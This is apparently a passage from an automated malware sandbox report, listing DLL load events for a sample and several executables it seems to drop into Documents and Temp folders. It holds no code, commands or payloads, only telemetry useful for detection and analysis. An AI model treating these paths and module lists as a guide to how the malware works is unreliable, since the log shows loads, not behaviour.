Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Documents\JKECGDBFCB.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013581001\2533b4b8c7.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1013583001\815f2a8fe8.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1013584001\0d957dbf73.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1013582001\feb3d39b6a.exe Section loaded: schannel.dll
